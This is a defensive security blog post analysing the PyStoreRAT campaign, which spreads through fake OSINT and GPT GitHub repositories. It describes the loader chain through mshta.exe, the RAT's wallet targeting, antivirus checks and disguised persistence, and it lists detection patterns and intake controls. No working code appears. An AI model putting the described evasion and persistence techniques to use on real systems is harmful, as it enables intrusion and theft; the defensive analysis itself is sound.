PyStoreRAT spreads via fake OSINT and GPT GitHub repos. Learn the attack chain and how AI-driven cybersecurity can detect and block repo-based malware.

Fake GitHub AI Tools: How PyStoreRAT Gets In
Most companies still treat GitHub like a trusted “app store for code.” Attackers are betting on that assumption—and they’re winning.
A recent campaign used GitHub repositories disguised as OSINT tools and GPT utilities to drop a new remote access trojan (RAT) called PyStoreRAT. The trick wasn’t a zero-day exploit. It was social proof: trending repos, inflated stars and forks, and “maintenance commits” that quietly swapped in a malicious loader after the project looked popular.
This post is part of our AI in Cybersecurity series, and it’s a useful reality check: bad actors are weaponizing the same AI-adjacent buzzwords your teams search for—“GPT wrapper,” “OSINT automation,” “DeFi bot”—to get execution on developer and analyst laptops. The good news is that AI-driven cybersecurity systems are uniquely suited to spot this pattern, because the campaign’s strength (scale and repetition) is also its weakness.
What PyStoreRAT is (and why this campaign works)
PyStoreRAT is a modular, multi-stage RAT delivered through tiny Python/JavaScript stubs hosted on GitHub. Those stubs download a remote HTML Application (HTA) and execute it with mshta.exe, a Windows utility that still shows up in real environments often enough to be abused.
Here’s why that matters: defenders often focus on malicious binaries. This campaign focuses on scripts and living-off-the-land execution—a path where signatures are weak, and where a quick glance at a repo can look “fine.”
The deception: “real enough” repos
The repositories weren’t sophisticated software. Many showed static menus, placeholder behavior, or minimal functionality. That’s intentional.
Attackers don’t need a great OSINT tool. They need a repo that:
- Matches what their target is already searching for (OSINT, GPT, security utilities)
- Looks active enough to earn trust
- Gets enough engagement (real or faked) to reduce skepticism
This is exactly the kind of deception AI hype enables. When teams are under pressure to “try that new GPT helper,” their risk tolerance quietly increases.
The payload chain: small loader, big consequences
The initial code in these repos was only a few lines. Its whole job: fetch an HTA remotely and execute it. From there, PyStoreRAT can pull down and run additional modules in multiple formats—EXE, DLL, PowerShell, MSI, Python, JavaScript, HTA.
A modular RAT is a practical choice for attackers because it adapts:
- Different environments block different things
- Payloads can be swapped without changing the repo
- “Just-in-time” malware reduces the chance the full toolset is caught early
How the GitHub “maintenance commit” becomes a supply chain attack
This campaign behaves like a supply chain attack, even though it’s not targeting a single vendor dependency. It targets the human habit of pulling tools from GitHub, running them locally, and trusting repo momentum.
Researchers observed a pattern where threat actors:
- Publish a repo that appears legitimate
- Let it sit (or slowly gain traction)
- Add malicious code later via a “maintenance” commit
That last step is the punchline: developers often skim the README, maybe glance at the star count, and run the script. They rarely audit commit history—especially if the repo already “seems established.”
Social proof as an attack primitive
Artificially inflating stars and forks is not just vanity. It’s a conversion tactic.
When a repo trends, it’s effectively receiving free distribution through:
- GitHub’s discovery surfaces
- YouTube “tool showcase” videos
- X posts and threads in OSINT/security communities
Attackers don’t need to phish credentials if they can persuade you to execute the first-stage loader yourself.
What PyStoreRAT does after execution
Once PyStoreRAT lands, it behaves like a full remote control framework with follow-on theft built in. It profiles the system, checks privileges, and fetches remote commands.
Targeting crypto wallets and sensitive files
The campaign specifically looks for cryptocurrency wallet-related artifacts, including files associated with products like Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02. That’s a clear monetization path: steal wallet data, drain funds, move on.
Even if your company isn’t “in crypto,” plenty of developers and analysts have personal wallets on work machines. And attackers know that.
Evasion: security product awareness
The loader collects installed antivirus products and checks for strings like “Falcon” and “Reason”—suggesting explicit awareness of certain endpoint stacks.
Two points worth taking seriously:
- This isn’t “spray and pray” malware written in isolation; it’s written with real enterprise controls in mind.
- Endpoint detection often triggers late in script-heavy chains, especially when execution is split across processes like
cmd.exeandmshta.exe.
Persistence and command execution
Persistence is achieved via a scheduled task disguised as an NVIDIA self-update. After that, the RAT can pull commands and perform actions such as:
- Download and execute EXEs (including an info-stealer like Rhadamanthys)
- Run PowerShell in memory
- Load DLLs via
rundll32.exe - Execute JavaScript dynamically in memory (including use of
eval()) - Install MSI packages
- Spread via removable drives by replacing documents with malicious LNK files
- Remove traces by deleting the scheduled task
That last bullet is the part most teams overlook: cleanup is a capability. If your detection and response process relies on “we’ll find it later in forensics,” attackers are actively trying to make sure you don’t.
Where AI-driven cybersecurity actually helps (and where it doesn’t)
AI doesn’t fix risky behavior, but it’s excellent at detecting patterns humans miss at scale. This campaign is perfect for AI-based defense because it’s repetitive: lots of similar repos, similar stubs, similar execution flows.
What to detect: behavior beats signatures
If you’re defending against trojanized GitHub repos, you want detection that’s centered on execution behavior, not file hashes.
High-signal behaviors in this campaign include:
- A developer tool (Python/Node) spawning Windows script execution (
mshta.exe) - Network calls to fetch remote HTA/JS content immediately before
mshta.exeexecution - Scheduled task creation with suspicious naming (e.g., “GPU update” themes) shortly after script execution
- Rapid “multi-loader” activity:
cmd.exe→mshta.exe→ script engine → download → execute
AI-based anomaly detection shines when it can baseline “normal developer workstation behavior” and flag:
- Rare parent/child process chains
- Unusual script interpreter usage
- New scheduled tasks created outside of patch windows
What to detect: repo and commit risk signals
Security teams can also apply AI to source provenance—not to judge code quality, but to score risk.
Signals worth modeling:
- Repos that suddenly spike in stars/forks faster than similar projects
- New or previously dormant accounts publishing multiple “security tools” rapidly
- “Maintenance commits” that introduce outbound network retrieval + execution
- Tools that don’t do what they claim (e.g., static menus, placeholder functions)
A practical stance: treat “popular” as a weak trust signal. Treat “executable behavior” as the strong one.
Where AI won’t save you
If your process allows anyone to pull random repos and run them on endpoints with broad permissions, AI detection becomes a backstop—not a solution.
The strongest control is still boring:
- Don’t run unvetted tooling on production-connected machines
- Use least privilege
- Put risky research tooling in an isolated environment
AI should enforce and automate those rules, not replace them.
A practical defense playbook for OSINT and GPT tooling
If your analysts and developers rely on OSINT tooling and GPT utilities, you need a lightweight gate that doesn’t kill productivity. Here’s what works in real teams.
1) Create a “research sandbox” standard
Make it normal to run new tools in an environment that can’t hurt you.
- Isolated VM or ephemeral dev container
- No access to corporate credentials by default
- No access to internal network segments
- Logging turned up (process creation + DNS + network egress)
If someone complains this slows them down, remind them how much slower incident response is.
2) Enforce execution controls for script interpreters
mshta.exe is a recurring villain because it’s a built-in execution path for remote HTA.
Controls to consider:
- Restrict or monitor
mshta.exeexecution on endpoints that don’t need it - Alert on
mshta.exelaunched bypython.exe,node.exe, orcmd.exe - Require code signing or allowlisting for internal automation scripts
3) Add “commit delta review” to your internal tool intake
Teams often do a one-time review of a repo and then forget it. This campaign exploits that.
A better pattern:
- Pin to a specific commit hash
- Re-review when updating
- Diff for: new network calls, new process execution, obfuscation, encoded blobs
Even a five-minute diff review catches most loader stubs.
4) Use AI to triage, not to rubber-stamp
If you use AI assistants for code review, set the expectation clearly:
- AI can summarize behavior and highlight suspicious patterns
- AI should not be treated as a security approval
- Human review is still required for anything that executes or downloads code
I’ve found the best workflow is: AI flags risk areas fast, then a human validates the top 5% most suspicious changes.
5) Prepare detection for follow-on stealers
PyStoreRAT’s chain includes deploying an infostealer (Rhadamanthys). That means you should assume:
- Browser credential theft
- Session/token theft
- Developer secrets exposure (API keys, SSH keys, cloud credentials)
If you’re not already scanning endpoints and repos for exposed secrets, you’re leaving money on the table—and attackers will collect it.
What this means for 2026 security planning
PyStoreRAT is a reminder that “AI tools” are now a phishing theme, a malware wrapper, and a distribution channel. Security teams that treat developer endpoints as semi-trusted will keep getting surprised.
The practical shift I want more orgs to make is simple: treat code acquisition (GitHub repos, packages, “helper scripts”) as part of your attack surface—then apply AI-driven cybersecurity where it excels: anomaly detection, behavioral correlation, and automated triage.
If your team is rolling out new OSINT automation or GPT utilities in 2026, ask one uncomfortable question before you scale adoption: Do we have a way to detect when a “tool” is actually a loader?